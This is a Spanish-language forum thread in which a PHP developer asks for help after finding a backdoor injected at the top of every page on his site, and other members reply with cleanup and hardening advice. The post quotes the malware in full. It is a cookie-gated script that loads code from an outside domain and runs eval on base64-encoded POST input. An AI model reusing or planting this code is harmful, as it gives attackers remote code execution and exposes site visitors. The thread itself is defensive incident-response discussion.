Mi web.. pobrecita.. jeje

Iniciado por bruno9111, 8 Marzo 2012, 16:02 PM

0 Miembros y 1 Visitante están viendo este tema.

bruno9111

Hola a todos!
Bueno después de años de inactividad en en elhacker.net he tenido que volver y esta vez mira como es el destino pues para hacer una pregunta de seguridad! jeje.

Bueno pues desde que deje el tema de exploit y desfaces, sniffer etc me he dedicado a programar en php, jquery y bueno todas esas cosas.

En una de las webs, la mas grande diria yo, intentando programar desde el trabajo con codeanywhere, me he dado cuenta de que tengo un backdoor

todos mis paginas.php empienzan asi:

      global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "[url="http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200)"]http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200)[/url]; echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

Ademas tenida 8 archivos que no tenian nada que ver con mi web y que nada pues ya elimine.
Esto es como los cuernos o es la primera vez que me pasa esto, o es la primera vez que me doy cuenta. jeje

Entonces tengo varias preguntas, a ver si alguien me ayuda..

1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?

2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?

3- hay alguna manera de prevenir?

4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?

Desde ya muchas gracias a quien se tome el tiempo, sea de leer que de responder!

Un saludo! :)

h3ct0r

Hola bruno,

Citar1- Eliminando los files nuevos que habia en mi web y borrando las primeras lineas de cada pagina desinfecta mi web?
No necesariamente, dependiendo del tipo de configuracion del servidor o vulnerabilidad de la pagina pudieron haber infectado otros archivos, instalado un rootkit, etc. Estas en un hosting compartido? Si es asi, otros sitios tambien pueden tener puertas traseras abiertas pudiendo volver a infectar, modificar, y tener acceso a todos tus archivos.

Citar2- Como entro eso a mi web? osea por que tipo de vulnerabilidad?
Pueden ser muchisimas, desde una configuracion deficiente en el servidor que te da hosting, a un exploit a una version de ftp vieja, o un sqlInjection y te instalaron una shell. Revisa tus logs, es una de las pocas maneras de saber que fue lo que paso y si el host no es tuyo reclamale a la empresa que te da hosting, aunque con tanto acceso que tuvieron puede que los invasores los borraron los logs.

Citar3- hay alguna manera de prevenir?
Si, si el hosting no cambia sus politicas de seguridad (si fue su culpa la invasion, claro)  cambia de hosting, y revisa muy bien tus scripts para solventar cualquier problema de sql injection, LFI, RMI, xss, crsf, etc. Es importante que le hagas auditrias de seguridad a tu sitio regularmente con las nuevas vulnerabilidades encontradas (Aqui en el foro siempre encontraras algo para probar). Si usas un framework, como wordpress, joomla, o parecidos mantenlos actualizados. Y nunca confies en plugins o modulos de terceros ya que generalmente esos son puntos de acceso para atacantes por ser mal codificados.

Citar
4- hasta que punto esta infeccion hace daño, osea puedo dar por sentado que el intruso tiene la password de todas mis cosas? solo del ftp? solo de las cuentas privadas de mi web?
Tenlo por seguro que si tuvo acceso a tus archivos ya agarro los archivos de configuracion de tu base de datos. Yo te recomendaria que cambies todas tus contrasenas y reportes a tus clientes lo sucedido para que tambien hagan lo mismo. Espero que tengas todas tus contrasenas e informaciones importantes codificadas en algo mejor que MD5. Hay bastantes "crackers online" de md5 y encuentras practicamente la mayoria de passwords usados.

Saludos!!
[img[/img]

disaster

te dejo esta pagina que te va a ayudar perfectamente ...

http://www.segu-info.com/